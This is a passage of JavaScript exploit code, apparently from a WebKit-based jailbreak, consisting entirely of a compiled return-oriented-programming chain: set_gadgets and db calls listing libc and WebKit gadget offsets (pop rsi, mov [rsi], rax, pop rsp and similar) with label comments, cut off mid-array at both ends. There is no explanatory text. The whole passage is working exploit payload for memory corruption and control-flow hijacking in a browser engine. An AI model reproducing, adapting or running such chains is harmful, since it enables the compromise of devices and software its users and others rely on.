libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5025: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5027: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+267984, //L5029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5029: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268088, //L5030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268104, //L5031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5030: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L5031: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+268192, //L5033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5033: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268248, //L5034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268320, //L5037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5037: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268376, //L5038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5038: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L5040 //L4981: libc_base+764760, //pop rsi ropchain+268480, //L5041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5043: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+268600, //L5046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268584, //L5044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5044: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5046: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+268776, //L5049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268792, //L5050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268744, //L5047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+268760, //L5048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5047: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5048: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5049: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5050: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+268888, //L5052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+268872, //L5051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5052: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5053: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5054: db([3, 0]); // 0x3 
set_gadget(libc_base+763368,); //pop rcx //L5055: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269088, //L5057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5057: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+269144, //L5058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5058: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+269280, //L5062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269264, //L5061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5060: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5062: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+269416, //L5065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+269448, //L5067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269400, //L5064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5066: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L5067: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+269560, //L5068+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+269552, //L5068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5068: db([0, 0]); // 0x0 set_gadgets([ ropchain+269576, //L5068+24 ropchain+271584, //L5063 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+269616, //L5069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5070: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L5071: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+269808, //L5075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269776, //L5073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269792, //L5074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5072: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5073: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5075: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269864, //L5077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5077: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+269992, //L5079 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+270008, //L5080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269976, //L5078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5078: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5079: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+270104, //L5082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+270088, //L5081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5081: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5082: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270184, //L5083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5083: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5085: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270304, //L5088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270288, //L5086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5088: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270448, //L5091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+270416, //L5089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270432, //L5090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5091: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+270520, //L5093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5093: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270576, //L5094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270656, //L5096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5096: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5098: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270776, //L5101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270760, //L5099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5099: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5101: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270920, //L5104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+270888, //L5102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270904, //L5103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5102: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5103: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+271008, //L5106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5105: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5106: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271064, //L5107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5107: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5109: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+271144, //L5111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5111: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271248, //L5112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271264, //L5113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5113: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+271352, //L5115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5115: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271408, //L5116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5116: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271480, //L5119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5119: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271536, //L5120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5120: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L5063: //L5040: //L4958: //L4869: libc_base+764760, //pop rsi ropchain+271624, //L5122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5122: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5124: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271744, //L5127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271728, //L5125 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5125: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5127: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+271920, //L5130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271936, //L5131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271888, //L5128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+271904, //L5129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5128: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5129: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5130: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5131: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272032, //L5133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272016, //L5132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5132: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5133: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272112, //L5134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5136: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+272232, //L5139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272216, //L5137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5137: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5139: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+272408, //L5142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+272424, //L5143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272376, //L5140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272392, //L5141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5140: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5141: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5142: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5143: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272520, //L5145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272504, //L5144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5144: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272600, //L5146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5148: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, 
//add rax, rsi libc_base+764760, //pop rsi ropchain+272720, //L5151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272704, //L5149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5149: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5151: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+272864, //L5154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272832, //L5152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272848, //L5153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5154: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272944, //L5155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5155: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5157: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273064, //L5160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273048, //L5158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5158: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5160: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273208, //L5163 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273176, //L5161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273192, //L5162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5162: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5163: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273288, //L5164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5166: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273408, //L5169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273392, //L5167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5167: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5169: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273552, //L5172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273520, //L5170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273536, //L5171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5172: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273632, //L5173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5173: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5175: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273752, //L5178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273736, //L5176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273896, //L5181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273864, //L5179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273880, //L5180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5179: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5180: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5181: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273976, //L5182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5184: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274096, 
